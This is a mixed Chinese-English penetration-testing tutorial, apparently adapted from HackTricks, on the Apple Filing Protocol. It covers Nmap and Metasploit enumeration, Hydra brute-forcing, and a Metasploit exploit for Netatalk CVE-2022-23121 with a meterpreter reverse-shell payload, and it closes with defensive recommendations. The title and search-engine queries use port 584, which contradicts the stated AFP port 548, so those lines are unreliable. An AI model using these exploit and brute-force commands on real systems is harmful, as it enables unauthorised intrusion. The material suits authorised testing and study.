--- title: "584 - Afp" weight: 584 date: "2026-03-10T10:03:28+08:00" lastmod: "2026-03-10T13:26:55+08:00" --- 💡 **学习提示**: 本文档介绍 **584 - AFP** 的渗透测试方法,适合信息安全初学者和从业人员参考。 ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 --- > ⚠️ **法律声明**: 本文档仅供学习和授权测试使用。未经授权的系统测试可能违反法律法规。 ## 548 - 渗透测试 Apple Filing 协议 (AFP) ### 基本信息 The **Apple Filing 协议** (**AFP**), once known as AppleTalk Filing 协议, is a specialized network protocol included within **Apple File 服务** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX-style and ACL permissions, resource forks, named extended attributes and sophisticated file-locking mechanisms. Although AFP has been superseded by SMB in modern macOS releases (SMB is the default since OS X 10.9), it is still encountered in: * Legacy macOS / Mac OS 9 environments * NAS appliances (QNAP, Synology, Western Digital, TrueNAS…) that embed the open-source **Netatalk** daemon * Mixed-OS networks where Time-Machine-over-AFP is still enabled **默认 TCP 端口:** **548** (AFP over TCP / DSI) ```bash PORT STATE SERVICE 548/tcp open afp ``` --- ### 信息收集 #### Quick banner / server info ```bash ## Metasploit auxiliary use auxiliary/scanner/afp/afp_server_info run RHOSTS= ## Nmap NSE nmap -p 548 -sV --script "afp-* and not dos" ``` Useful AFP NSE scripts: | Script | What it does | |--------|--------------| | **afp-ls** | List available AFP volumes and files | | **afp-brute** | 密码 brute-force against AFP login | | **afp-serverinfo** | Dump server name, machine type, AFP version, supported UAMs, etc. | | **afp-showmount** | List shares together with their ACLs | | **afp-path-vuln** | Detects (and can exploit) directory-traversal, CVE-2010-0533 | The NSE brute-force script can be combined with Hydra/Medusa if more control is required: ```bash hydra -L users.txt -P passwords.txt afp:// ``` #### Interacting with shares *macOS* ```bash ## Finder → Go → "Connect to Server…" ## or from terminal mkdir /Volumes/afp mount_afp afp://USER:[email protected]/SHARE /Volumes/afp ``` *Linux* (using `afpfs-ng` ‑ packaged in most distros) ```bash apt install afpfs-ng mkdir /mnt/afp mount_afp afp://USER:[email protected]/SHARE /mnt/afp ## or interactive client afp_client ``` Once mounted, remember that classic Mac resource-forks are stored as hidden `._*` AppleDouble files – these often hold interesting metadata that DFIR tools miss. --- ### Common Vulnerabilities & 漏洞利用 #### Netatalk unauthenticated 远程代码执行 chain (2022) Several NAS vendors shipped **Netatalk ≤3.1.12**. A lack of bounds checking in `parse_entries()` allows an attacker to craft a malicious **AppleDouble** header and obtain **remote root** before authentication (**CVSS 9.8 – CVE-2022-23121**). A full write-up by NCC Group with PoC exploiting Western-Digital PR4100 is available. Metasploit (>= 6.3) ships the module `exploit/linux/netatalk/parse_entries` which delivers the payload via DSI `WRITE`. ```bash use exploit/linux/netatalk/parse_entries set RHOSTS set TARGET 0 # Automatic (Netatalk) set PAYLOAD linux/x64/meterpreter_reverse_tcp run ``` If the target runs an affected QNAP/Synology firmware, successful exploitation yields a shell as **root**. #### Netatalk OpenSession heap overflow (2018) Older Netatalk (3.0.0 - 3.1.11) is vulnerable to an out-of-bounds write in the **DSI OpenSession** handler allowing unauthenticated code execution (**CVE-2018-1160**). A detailed analysis and PoC were published by Tenable Research. #### Other notable issues * **CVE-2022-22995** – Symlink redirection leading to arbitrary file write / 远程代码执行 when AppleDouble v2 is enabled (3.1.0 - 3.1.17). * **CVE-2010-0533** – Directory traversal in Apple Mac OS X 10.6 AFP (detected by `afp-path-vuln.nse`). * Multiple memory-safety bugs were fixed in **Netatalk 4.x (2024)** – recommend upgrading rather than patching individual CVEs. --- ### Defensive Recommendations 1. **Disable AFP** unless strictly required – use SMB3 or NFS instead. 2. If AFP must stay, **upgrade Netatalk to ≥ 3.1.18 or 4.x**, or apply vendor firmware that back-ports the 2022/2023/2024 patches. 3. Enforce **Strong UAMs** (e.g. *DHX2*), disable clear-text and guest logins. 4. Restrict TCP 548 to trusted subnets and wrap AFP inside a VPN when exposed remotely. 5. Periodically scan with `nmap -p 548 --script afp-*` in CI/CD to catch rogue / downgraded appliances. --- #### [Brute-Force](../generic-hacking/brute-force.md#afp) --- ### 搜索引擎语法 #### FOFA ```bash # FOFA 搜索语法 port="584" ``` #### Shodan ```bash # Shodan 搜索语法 port:584 ``` #### ZoomEye ```bash # ZoomEye 搜索语法 port:584 ``` --- ## 📖 参考资料 - [HackTricks - 584-afp](https://book.hacktricks.wiki/en/network-services-pentesting/584-afp.html)